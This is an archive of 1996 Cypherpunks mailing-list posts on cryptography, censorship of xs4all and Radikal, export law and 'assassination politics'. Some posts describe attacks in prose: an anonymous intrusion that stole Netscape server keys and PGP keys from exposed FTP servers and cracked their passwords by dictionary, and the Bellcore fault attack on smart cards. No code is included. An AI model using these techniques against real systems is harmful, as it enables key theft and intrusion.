http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" From Adamsc at io-online.com Thu Sep 26 01:37:15 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 26 Sep 1996 16:37:15 +0800 Subject: Uses of Computational Chaos Message-ID: <19960926062611125.AAA204@GIGANTE> On Wed, 25 Sep 1996 13:46 EDT, E. Allen Smith wrote: >>Supposing, too, that you know these weaknesses, would using separate algorithms >>for different portions of the number work well? > That would seem to be a possibility; admittedly, the local copy of >AC has been checked out for the past year, so I haven't been able to take a >look at it. I'd tend to think that if you _know_ the flaw, one could come up >with a better way to deal with it than the generalized method I discussed. >For instance, if the MSB of bytes coming out of a scribble window is too low >in entropy, only use it XORed or whatever with a more-random bit. That's what I was thinking. Or possibly even replace the MSB with the MSB from another algorithm with other characteristics. Genetic programing would also be interesting here if you could write a program that would mix-n-match algorithms/seeds and gradually choose one that produces very high entropy! # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" From dthorn at gte.net Thu Sep 26 01:40:32 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 16:40:32 +0800 Subject: Public Schools In-Reply-To: Message-ID: <324A206C.44AE@gte.net> Dr.Dimitri Vulis KOTM wrote: > Phil Fraering writes: > > Without vouchers, you don't say anything about the intelligence of > > your test subjects; to a _very_ large degree, intelligence isn't > > genetic. Or > That's the political correct thing to say, but do you have any > scientific evidence to support this claim? People have argued for genetic disposition to certain things, and I think they are sometimes (most times?) confused between genetics per se (genes et al) and the way environment creates much of the being indirectly. For example, you are born with a chemical factory inside of you. The amount and timing of hormonal secretions from myriad sources inside the body has a dramatic effect on the development of the being, and environment has a dramatic effect on the amount and timing of said hormonal secretions. You can bias the formula all you want, but it can go in unpredictable directions, due to the great variety of influences. From mccoy at communities.com Thu Sep 26 01:52:07 1996 From: mccoy at communities.com (Jim McCoy) Date: Thu, 26 Sep 1996 16:52:07 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: Greg Kucharo writes: >I fail to see how the Executive can simply avoid the authority and >oversight of the Judicial. Are there other circumstances of this? From >my constitutional reading the Judiciary has the right to review any law >passed by Congress. The Executive only has the power to enforce, not to >unilaterally pass rules unrelated to enforcement. The executive branch cannot, but the legislative branch has the power to restrict the jurisdiction of the courts in any way it wants to except for cases in which the Supreme Court is given original jurisdiction (a limited number of situations) Ironically enough, Marshall's decision in Marbury v. Madison was that the Judicial Act of 1789 which outlined the jurisdiction of the court system was unconsitutional. It is Congress which gives the courts their jurisdiction, only the Supreme Court is given original jurisdiction in the Constitution itself (interesting side note: The case New York v. New Jersey regarding the ownership of Ellis island, I think, was the first case of original jurisdction to be argued in the current supreme court building if that tell you how often such cases come up...) jim From dthorn at gte.net Thu Sep 26 01:53:28 1996 From: dthorn at gte.net (Dale Thorn) Date: Thu, 26 Sep 1996 16:53:28 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: Message-ID: <324A22AC.4A96@gte.net> Phil Fraering wrote: > I guess the final word on assasination politics would be obvious: > It's widely believed that the New Orleans Mafia (the source of my > recent statement about body decomposition in Louisiana swamps) was a > prime driver in the assasination of the late President John F. > Kennedy. > I think it's fairly safe to say that having done this didn't do them a > damn bit of good. It didn't do anyone else a damn bit of good. > The world remained just as corrupt as it always was. Sometimes a person just gets mad, and what can you do? Anyway, a long time ago, someone inscribed a small stone or tablet with fragments of several obscure written languages, later to be called the Rosetta Stone. The JFK assassination is a Rosetta Stone too. Dig in! From mix at squirrel.owl.de Thu Sep 26 02:07:05 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Thu, 26 Sep 1996 17:07:05 +0800 Subject: A periodic alert regarding Tim C. Mayo Message-ID: <19960926053220.10997.qmail@squirrel.owl.de> Here, Tim C. Mayo descends into total inanity. He should have a cold shower and/or a Turkish coffee. From pgf at acadian.net Thu Sep 26 02:22:06 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 17:22:06 +0800 Subject: Medical Data In-Reply-To: Message-ID: You're absolutely correct about the informed patient bit; I have developed the policy of checking the PDR entry for any medication I take. And found out about some interactions my doctor didn't tell me about. There's a paradox about Andy Grove's situation: if he starts browsing medical databases and someone can analyze his traffic, or scans his traffic on a closed but not encrypted private email support group, they can deduce much about his condition. Now since everyone else knows about Grove's situation anyway (I suppose he talked about it) and it was brought up regarding my comments about pharmaceutical interactions (and in those comments I was acting reflexively towards a phobia about medical interactions) it's a moot point concerning the medical side and his privacy information; but the privacy angle still needs to be considered in the general case: In order for someone to do this in complete privacy, encryption would have to be ubiquitous; the norm, rather than the exception it is now. There aren't records of who looks up something in the PDR at your local library, but an ISP could gather much info about its users from what sites they frequent... Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From dlv at bwalk.dm.com Thu Sep 26 02:27:02 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 17:27:02 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: <0HJuuD36w165w@bwalk.dm.com> "Mark M." writes: > In an effort to get anonymity and message pools more widespread, I think it > would be a good idea to establish a newsgroup for anonymous message pools tha > would get the same distribution as any other newsgroup in the "big 8". The > "misc" hierarchy is probably the best place for such a newsgroup since it > already carries groups like "misc.misc" and "misc.test". Does anyone have an > suggestions or objections? It should be under misc.activism: misc.activism.anonymity or even m.a.privacy. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From weber at iez.com Thu Sep 26 03:00:05 1996 From: weber at iez.com (Rolf Weber) Date: Thu, 26 Sep 1996 18:00:05 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609251555.QAA00118@server.test.net> Message-ID: <9609260757.AA12338@spibm02> > > I'm trying to work up some _action_ here, any takers, German cpunks? > there was action. press relaeses were published, and the public prosecuter general has been informed about the technical background. latest news say that german providers stopped the blockage. i'm awaiting what happens after restoration of 'radical 154'. :-) rolf From weber at iez.com Thu Sep 26 03:05:17 1996 From: weber at iez.com (Rolf Weber) Date: Thu, 26 Sep 1996 18:05:17 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <9609260751.AA12336@spibm02> > > (One German on the list has opinioned that they are 'childish' > but that doesn't say much.) > how could you define childish? i did read 'radical'. my impression was that's childish, but don't ask from me to start a discussion about it. perhaps they translate it to english, so you can see by yourself. that's the idea of free speech. rolf From sasha1 at netcom.com Thu Sep 26 03:30:14 1996 From: sasha1 at netcom.com (Alexander 'Sasha' Chislenko) Date: Thu, 26 Sep 1996 18:30:14 +0800 Subject: CONF/ORG: EXTRO-3 date Message-ID: <3.0b26.32.19960926012027.00693d04@netcom.com> We are trying to plan the time for the EXTRO-3 - the Third in the infinite series of Extropian conferences. The tentative dates for EXTRO-3 are now weekends of August 2-3 and August 9-10 of 1997, with a backup plan of July 26-27 weekend. We would like to select the date so that it would not interfere with other conferences, and be convenient for everybody. If you know of any other events of extropian/transhumanist/libertarian/ life-extension/cypherpunk interest planned for one of those weekends, or if you would like to attend and have have personal preferences for one of these days, please send me _private_ mail at sasha1 at netcom.com (You can find general info on Extropianism at http://www.primenet.com/~maxmore/extropy.htm ) On behalf of the of Extropian Action Team, ------------------------------------------------------------------------- Alexander Chislenko www.lucifer.com/~sasha/home.html Firefly Network, Inc.: www.ffly.com ------------------------------------------------------------------------- From pgut001 at cs.auckland.ac.nz Thu Sep 26 05:28:24 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Thu, 26 Sep 1996 20:28:24 +0800 Subject: How to break Netscape's server key encryption - Followup Message-ID: <84373168812186@cs26.cs.auckland.ac.nz> There has been a successful hostile attack on a Netscape server key using the code I posted yesterday. I was contacted earlier today by someone who told me he had in the past obtained Netscape server keys and PGP private keys from Windows NT machines running Microsofts insecure FTP server which allows access to the entire drive (he found some of the PGP keys using archie searches - ouch!). He lives somewhere with nasty anti-hacking laws and definitely doesn't want his identity known, but after some pleading said I could reveal the following: - He used the cracklib dictionary to get the password - The password was found "very quickly" - The password was a female name - He deleted the server key after he'd found the password - He did it merely out of idle curiosity and has no intention of misusing the information. - He definitely doesn't want to be contacted Peter. From aaron at burn.ucsd.edu Thu Sep 26 06:51:57 1996 From: aaron at burn.ucsd.edu (Aaron) Date: Thu, 26 Sep 1996 21:51:57 +0800 Subject: Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES Message-ID: I am writing in reference to the document, Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES, which is available on the web as , with links to related documents and information at . I think that information about the German government's attacks on the web, and on revolutionary publications, should be propogated as widely as possible, and I encourage those who have not seen the 'Global Alert' and related documents to download and read them. I am very disturbed, however, by some of the formulations in the 'Alert', and I want to make my criticisms widely known as well, since I believe that the issues I raise are very important for defenders of free communication. I understand that others may disagree about both the correctness and importance of my criticisms. So be it. Here are the offending passages and my criticisms: >The proper response to offensive expression is more and better >expression, and prosecution of offending criminals, not censorship. This reference to 'offending criminals' seems to imply that those who create 'offensive expression' may properly be regarded as 'criminals' and prosecuted on account of that expression, in case some government has decided to criminalize such expression. >As a result of the overly broad censorship measure which targets >an entire Internet access provider instead of a specific user This implies that censorship which targets a specific user might be alright! >Access for All, though it has expressed willingness to assist the Dutch >police in identifying online criminals abusing the xs4all system ... This is the most disturbing statement in the document. It apparently threatens to turn over users of the system to the police if they are (by whose definition?) 'online criminals abusing the xs4all system'. >Instead of the futile act of censorship ... the German government >should have acted through legal channels and asked the authorities in >the Netherlands to cooperate in determining what legal action, if any, >was appropriate. Is it appropriate to advise the German government how to carry out its attacks on left media in a less 'futile' manner? Do you want to say that the German government has a right to ask for assistance from the Dutch government in carrying out these attacks? Are you sure that the Dutch government will not, in the not-so-distant future, be willing to help them? --Aaron P.S. I am a news broadcaster and commentator with Free Radio Berkeley, a well-known unlicensed radio station. I will continue to report on this story until the German government gives up its attempts to suppress Radikal and other revolutionary publications. From adam at homeport.org Thu Sep 26 08:00:14 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 26 Sep 1996 23:00:14 +0800 Subject: Mitsubishi MISTY LSI In-Reply-To: <199609252037.UAA11310@pipe2.ny3.usa.pipeline.com> Message-ID: <199609261246.HAA03620@homeport.org> John Young wrote: | Mitsubishi Electric Corp. said it has developed an LSI | that can encrypt data at a speed of 450 megabits per | second, which is four times faster than any other | encryption chip developed in Japan and brings domestic | technology in line with DES, the U.S.-developed | encryption system that has become the standard in the | U.S. and Europe. Its worth noting that even if the chip is as fast as they claim (quite possible), and if its highly key agile (less probable, but not unlikely), it may not be feasable to build devices that work at anything near that speed, due to bus issues, i/o barriers, etc. Also, in response to Bill Frantz's snake oil questions, we need to wait a few years before using it. Unfortunately, in the real world, there are people installing point to point ATM links, who need this speed today, and might choose to install as evesdropping protection. Weak crypto, acknowledged and understood as such, can be better than plaintext. Strong crypto is obviously better, and I'll happily take pointers to vendors of 100mb ethernet, fddi or >=155mb atm crypto hardware thats available today. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jya at pipeline.com Thu Sep 26 08:09:53 1996 From: jya at pipeline.com (John Young) Date: Thu, 26 Sep 1996 23:09:53 +0800 Subject: FLA_wed Message-ID: <199609261208.MAA13283@pipe3.ny2.usa.pipeline.com> 9-26-96. NYP: "Potential Flaw In Cash Card Security Seen. Counterfeiting a Risk, Say Bellcore Scientists." Markoff. A potential security flaw has been discovered that might make it possible to counterfeit many types of the electronic-cash "smart cards" that are now widely used in Europe and are being tested in this country, reports a paper set to be released today. The Bellcore researchers said that a smart card's security could be breached by forcing the microchip in the card to make a calculation error, whether through sophisticated means like bombarding the card with radiation or perhaps cruder methods like placing it in a microwave oven. A mathematical formula they derived could use this error to extrapolate the secret data that authenticates the card when it is used. ----- http://jya.com/flawed.txt (6 kb) FLA_wed From dlv at bwalk.dm.com Thu Sep 26 08:19:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 23:19:44 +0800 Subject: More proposals for European censorship In-Reply-To: <324A17BE.4C09@gte.net> Message-ID: <1P3uuD38w165w@bwalk.dm.com> Dale Thorn writes: > I can't possibly > be doing anything illegal by logging on to this service and receiving > and posting email to cypherpunks "Practicing cryptography without a licence?" --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Thu Sep 26 09:29:46 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 27 Sep 1996 00:29:46 +0800 Subject: 45K fine for possession Message-ID: --- begin forwarded text X-Sender: vinnie at apple.com (Unverified) Mime-Version: 1.0 Date: Wed, 25 Sep 1996 12:18:07 -0700 To: rah at shipwright.com From: Vinnie Moscaritolo Subject: 45K fine for possession Status: U http://www.nando.net/newsroom/ntn/info/092596/info13_25205.html Singapore fines first resident for Internet obscenity Copyright � 1996 Nando.net Copyright � 1996 The Associated Press SINGAPORE (Sep 25, 1996 08:48 a.m. EDT) -- A Singapore resident has been fined for downloading obscene pictures from the Internet, the first such case since the government announced it will censor what people can see on the global computer network. Lai Chee Chuen, 41, pleaded guilty Monday to charges of collecting of pornographic pictures from the Internet and of possessing Penthouse, a magazine banned in Singapore, the Straits Times newspaper reported today. It said Lai was fined $43,900. In July, the government announced rules for censoring the Internet. By a Sept. 15 deadline, the three local Internet providers installed powerful computers blanking out some of the sites that showed prohibited pornography or anti-government material. Police seized the pictures from Lai's home in July 1995. Laws covering computer pornography have yet to be drawn up, so the government prosecuted Lai under a general law against possession of obscene visual images. Lai's conviction served to demonstrate that the government's Internet regulations are no idle threat. The Times, a pro-government newspaper, published Lai's picture on the front page to emphasize the point. Neither Lai nor police were available for comment. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From trei at process.com Thu Sep 26 10:22:37 1996 From: trei at process.com (Peter Trei) Date: Fri, 27 Sep 1996 01:22:37 +0800 Subject: FPGAs (was: Edited Edupage, 19 Sept 1996) Message-ID: <199609261338.GAA14701@toad.com> > From: IN%"educom at educom.unc.edu" 20-SEP-1996 01:52:41.56 > > >***************************************************************** > >Edupage, 19 September 1996. Edupage, a summary of news about information > >technology, is provided three times a week as a service by Educom, > >a Washington, D.C.-based consortium of leading colleges and universities > >seeking to transform education through the use of information technology. > >***************************************************************** > >PROGRAMMABLE COMPUTER CHIPS > >Next month, Metalithic Systems Inc. will release a $1500 sound board called > >Digital Wings that uses field-programmable gate array computer chips that > >can be personalized, allowing the user to create and edit up to 128 > >soundtracks. When used in combination with Windows 95, Digital Wings will > >give users access to audio synthesis and editing tools comparable to those > >of a professional sound studio. (Business Week 23 Sep 96 p86) > > I wonder exactly how reprogrammable this system is... Who cares? If you want to program an FPGA, there are plenty of cheaper systems available: for example, see http://204.58.152.114/products/isa.html Peter Trei trei at process.com From brianh at u041.oh.vp.com Thu Sep 26 10:23:28 1996 From: brianh at u041.oh.vp.com (Brian Hills) Date: Fri, 27 Sep 1996 01:23:28 +0800 Subject: FW: Internet Scam TRUE? Message-ID: This lexis-nexus is running around again, is this a true statement? Or another hoax going around? I had not seen any comments on this list yet. The person who forward this to me had not provided where this originated from. Thank You b > > > > > > Subject: FW: Internet Scam > > > Date: Thursday, September 26, 1996 > > > > > > FYI > > > > > > More on the Lexis-Nexis connection: > > > > > > Subj: Internet Scam > > > > > > Many of you have probably received a message lately regarding a > > > company called Lexis which is distributing names, social security > > > numbers, etc. to people over the internet for illegal use (i.e. to obtain > > > credit in > > > your name). The message advises you to call a number, give your name and > > > social > > > security number, and they will take you off the list. > > > > > > DON'T DO THIS!! > > > > > > The scam is to have you call and give the info to them. The social > > > security office is advised of this and is investigating the company. From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 26 10:35:58 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 27 Sep 1996 01:35:58 +0800 Subject: How to break Netscape's server key encryption - Followup Message-ID: Could someone please repost the code referred to in this posting? I seem to have missed it, and I'm curious to see how it works. Thanks! Patrick _______________________________________________________________________________ From: pgut001 at cs.auckland.ac.nz on Thu, Sep 26, 1996 9:47 Subject: How to break Netscape's server key encryption - Followup To: cypherpunks at toad.com There has been a successful hostile attack on a Netscape server key using the code I posted yesterday. I was contacted earlier today by someone who told me he had in the past obtained Netscape server keys and PGP private keys from Windows NT machines running Microsofts insecure FTP server which allows access to the entire drive (he found some of the PGP keys using archie searches - ouch!). He lives somewhere with nasty anti-hacking laws and definitely doesn't want his identity known, but after some pleading said I could reveal the following: - He used the cracklib dictionary to get the password - The password was found "very quickly" - The password was a female name - He deleted the server key after he'd found the password - He did it merely out of idle curiosity and has no intention of misusing the information. - He definitely doesn't want to be contacted Peter. ------------------ RFC822 Header Follows ------------------ Received: by mail.ndhm.gtegsc.com with SMTP;26 Sep 1996 09:47:35 -0400 Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP; Thu, 26 Sep 1996 13:44:58 GMT Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id CAA12813 for cypherpunks-outgoing; Thu, 26 Sep 1996 02:53:13 -0700 (PDT) Received: from cs20.cs.auckland.ac.nz (root at cs20.cs.auckland.ac.nz [130.216.34.10]) by toad.com (8.7.5/8.7.3) with ESMTP id CAA12807 for ; Thu, 26 Sep 1996 02:53:09 -0700 (PDT) From: pgut001 at cs.auckland.ac.nz Received: from cs26.cs.auckland.ac.nz by cs20.cs.auckland.ac.nz (8.7/4.7) id VAA14298; Thu, 26 Sep 1996 21:54:11 +1200 (NZST) Received: by cs26.cs.auckland.ac.nz (relaymail v0.9) id <84373168812186>; Thu, 26 Sep 1996 21:54:48 (NZST) To: cypherpunks at toad.com Subject: How to break Netscape's server key encryption - Followup Reply-To: pgut001 at cs.auckland.ac.nz X-Charge-To: pgut001 X-Authenticated: relaymail v0.9 on cs26.cs.auckland.ac.nz Date: Thu, 26 Sep 1996 21:54:48 (NZST) Message-ID: <84373168812186 at cs26.cs.auckland.ac.nz> Sender: owner-cypherpunks at toad.com Precedence: bulk From pgf at acadian.net Thu Sep 26 10:47:19 1996 From: pgf at acadian.net (Phil Fraering) Date: Fri, 27 Sep 1996 01:47:19 +0800 Subject: Cuba, Iraq, AP... In-Reply-To: <199609260356.WAA00453@smoke.suba.com> Message-ID: On Wed, 25 Sep 1996, snow wrote: > Some would say that 1) Saddam (as a problem) was _created_ by the US, > and it would not be in the interest of certain people to have him die. > Along the same lines, Castro, while not exactly friendly (and who can blame > him) to the US, is also not a threat, and never really has been. Killing > him would serve no purpose. Shortly after the Gulf War elements in the Iraqi military tried to overthrow Hussein; they apparently tried to co-ordinate with the U.S., who tried to co-ordinate with Saudi Arabia, who warned Saddam that there was going to be a coup attempt; gotta stop that Ol' power vaccuum... The fact that the people who performed the Bay of Pigs were enticed into it by promised but withdrawn U.S. military support is a matter of public record; would Castro still be in power had the United States not (intentionally? I don't know) destroyed the core resistance against him in that fashion? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From sandfort at crl.com Thu Sep 26 11:04:19 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 27 Sep 1996 02:04:19 +0800 Subject: 45K fine for possession In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Wed, 25 Sep 1996, Robert Hettinga wrote: > > --- begin forwarded text > ... > Lai Chee Chuen, 41, pleaded guilty Monday to charges of collecting of > pornographic pictures from the Internet and of possessing Penthouse, a > magazine banned in Singapore, the Straits Times newspaper reported today. When I was acting for th--then government owned--Singapore Broadcasting Corporation, another actor showed me a smuggled in copy of the Asian edition of Penthouse. It cost him S$30, about US$20. As tame as it was, it was hot stuff as far as he was concerned. Apparently, the law is only enforced selectively to make a point. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From bdavis at thepoint.net Thu Sep 26 11:20:11 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 27 Sep 1996 02:20:11 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <9609251433.AB02026@cti02.citenet.net> Message-ID: On Wed, 25 Sep 1996, Jean-Francois Avon wrote: > On 25 Sep 96 at 5:59, Brian Davis wrote: > > > I disagree that that will be the response, but you should be willing > > to allow one group of people to fight fire with fire. > > But generally, it has been found a much better solution to fight fire > with water, and this is why I am not convinced of the ideological > effectiveness of AP, although I don't doubt it's operationnal > effectiveness at all. If by "operation effectiveness" you mean some people will be killed, I agree. I also agree with the fire/water comment (maybe in more ways than one!); my comment related to my belief that AP-supporters shouldn't complain about especially draconian measures taken against them by governments, given their modus operandi. EBD > > I will take that sentence only slightly out-of-(specific)-context and > make a still pertinent remark about it: > > This is *exactly* what Jim Bell, because of his opinions, > envision to do with the AP system. > > > I find that absolutely hilarious! > > jfa > > Please reply by e-mail since I am not on Cypherpunks anymore. > From rah at shipwright.com Thu Sep 26 11:46:06 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 27 Sep 1996 02:46:06 +0800 Subject: Newsgroup proposal: misc.anonymous In-Reply-To: Message-ID: At 10:51 pm -0400 9/25/96, Mark M. wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > In an effort to get anonymity and message pools more widespread, I think it > would be a good idea to establish a newsgroup for anonymous message pools >that > would get the same distribution as any other newsgroup in the "big 8". The > "misc" hierarchy is probably the best place for such a newsgroup since it > already carries groups like "misc.misc" and "misc.test". Does anyone >have any > suggestions or objections? I do know that there was an alt.anonymous.messages, or some such. Haven't looked at it lately, but I don't remember too much traffic on it... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From tank at xs4all.nl Thu Sep 26 12:30:24 1996 From: tank at xs4all.nl (tank) Date: Fri, 27 Sep 1996 03:30:24 +0800 Subject: German ICTF stopped blocking xs4all. Radikal back online Message-ID: <199609261608.SAA24058@xs1.xs4all.nl> Hi, On the evening of september 24th ICTF stopped blocking xs4all after we removed the pages. More information about that can be found at http://www.anwalt.de/ictf (although not much). Today we've put the radikal back on xs4all :) For more background information http://www.xs4all.nl/~felipe/germany.html henk (SPG) From tcmay at got.net Thu Sep 26 12:59:08 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 03:59:08 +0800 Subject: Taking crypto out of the U.S. Message-ID: At 5:55 AM 9/26/96, Adamsc wrote: >On Wed, 25 Sep 1996 06:26:31 -0500 (EST), Adam Shostack wrote: > >>| >Theres a personal use exemption. Michael Froomkin's web page has a >>| >pointer to it. > >>| What if your laptop gets "stolen"? Or you sell it for a plane ticket home >>| after your wallet gets pinched? > >>You're required to report it to the Feds. RTFU. > >Yeah, but you can't be persecuted. So what happens if Joe-Cryptographer >writes a *great* NSA-stumping crypto program - not for export - and it just >happens to get pinched (The police might even recover it!)? Outside >distribution w/o penalties... This is what judges and juries are for. Interpreting the "spirit of the law." (I feel strange defending the legal system, but in plain English: it ain't this stupid. A defense of "I didn't give secrets to the Koreans, I was just reading these documents outside their embassy, and they blew off the bench and onto their property." won't cut it. Or, at least, I think there's a fair chance a jury would find one guilty of espionage, treason, whatever.) Now I don't think there's any real chance of being prosecuted for having a laptop lost or stolen, regardless of what it contains (unless it was true DOD secret stuff, and then the discipline would be handled internally to one's agency), but don't think for a second that this is a new "loophole" in the export laws! --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Thu Sep 26 13:19:07 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 04:19:07 +0800 Subject: Weaknesses in Smart Cards? (Re: FLA_wed) Message-ID: Thanks, John. I read the full article. I'm skeptical. At 12:08 PM 9/26/96, John Young wrote: > 9-26-96. NYP: > > "Potential Flaw In Cash Card Security Seen. Counterfeiting > a Risk, Say Bellcore Scientists." Markoff. > The Bellcore researchers said that a smart card's > security could be breached by forcing the microchip in > the card to make a calculation error, whether through > sophisticated means like bombarding the card with > radiation or perhaps cruder methods like placing it in > a microwave oven. A mathematical formula they derived > could use this error to extrapolate the secret data that > authenticates the card when it is used. As the researchers note, they haven't actually done this. Having worked on radiation effects on chips, I'm skeptical that this can be done economically. Simple radiation sources won't be penetrating enough (for the high "linear energy transer" (LET) particles needed to deposit enough energy to flip a logic state) and the penetrating stuff (betas and gammas) are low-LET and will only disrupt logic states in very high overall exposures (kilorads). A cyclotron, for example, could get some high-LET particles through the packaging to the chips. Strip-back of the outer packaging is possible, of course. I'd need to know a lot more about the packaging used by VISA and other smartcard makers to know how economical this would be. (Breaking any single card is not necessarily a financial windfall, if the card has a limit, for example. This puts a limit on how much $$$ can be spent on cracking a chip.) Also, there are electrically-erasable PROM (EEPROM) chips which are very difficult to clone, and which would have response properties to radiation which are much different from static RAMs and microprocessors. The "microwave oven" point I won't comment on. Their work on what might be called a kind of "avalanche" algorithm, where a few flaws in operation yield secrets at the output, seems interesting. However, one thing that disturbs me (and their work is not the only example) is the "press release" nature. Especially for _theoretical_ work, rather than actual demonstration! When the cracking of a 40-bit key was done about a year ago (by a couple of Cypherpunks, including the French student), it was a *real* crack, not a press release about a _possible_ attack. Likewise, the Netscape crack by Wagner and Goldberg was a *real* attack. But as the "arms race" for press releases about potential security flaws escalates, it appears people are pre-announcing results, or gussying-up potential flaws in the language of scary press releases. Not a good journalistic trend, in my opinion. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From azur at netcom.com Thu Sep 26 13:38:35 1996 From: azur at netcom.com (Steve Schear) Date: Fri, 27 Sep 1996 04:38:35 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: >Indeed it may not be practical to try such a program on current >computers. I've had thoughts for some time about an analogy where each >person in a civilization represents a cell in a single brain, and so on, >so perhaps AP is merely a portion of the program for this "brain". As >to what happens when you try to concentrate a disproportionate amount of >the programming task into a few hands, that appears to be the situation >we have now. For an excellent high-level coverage of 'hive' behaviour in man and machine see Kevin Kelly's, "Out of Control: the raise of neo-biological civilization" (also has significant coverage of us cypherpunks), Addison-Wesley, 1994, ISBN 0-201-57793-3. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. "Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S. Lewis "Surveillence is ultimately just another form of media, and thus, potential entertainment." -- G. Beato From unicorn at schloss.li Thu Sep 26 13:47:41 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 27 Sep 1996 04:47:41 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Timothy C. May wrote: > At 2:03 AM 9/26/96, Black Unicorn wrote: > >On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > > > >> > >> Soon I am going to be going overseas to Japan, and I want to take > >> > >> my notebook with me so I can keep up with everything, however, I have > >> > >> encrypted my hard drive and usually encrypt my mail. Is this in > >> > >> violation of the ITAR to keep everything the same when I go over? > >> > >> Gentlemen, us customs does not give shit about what you take out > >> on your diskettes. > >> > >> When I went to Russia recenty, I took PGP for DOS, and no one gave > >> me any problem. > >> > >> IANAL > > > >Obviously not, you've just confessed to a felony. > > So? > > "Confessing to a felony" is meaningless, as I understand things. While BU > is a lawyer, and I am not, I maintain "confessing to a felony" is > meaningless without several necessary factors: Mr. May is absolutely correct. But let me discuss why I still think it's dangerous. > > a. interest by law enforcement that a crime has been committed and needs to > be prosecuted Interest by law enforcement is impossible to predict. It can be driven by politial winds, and by fancy as well as unlucky coincidence. (The drug dealer who is busted because the police respond to a fight 911 call at the wrong address). The law is not fair in this regard. Prosecution is always selective and all one needs is an administration decision (even by some mid-level idiot at justice) and suddenly crypto export could be a serious issue. > > b. evidence that the "confession" can be backed up by other evidence > In the case of the export at hand, a passport record exists, and surely the notebook exists. Were I a prosecutor with a bug in my rectum, I would think I had something of a case. > c. common sense This has never had anything to do with prosecution. I wish it did. > Thus, if even former prosecutor Brian Davis, when he was a prosecutor, were > to have "confessed to a felony" (for example, saying a bad word on a forum > where minors might 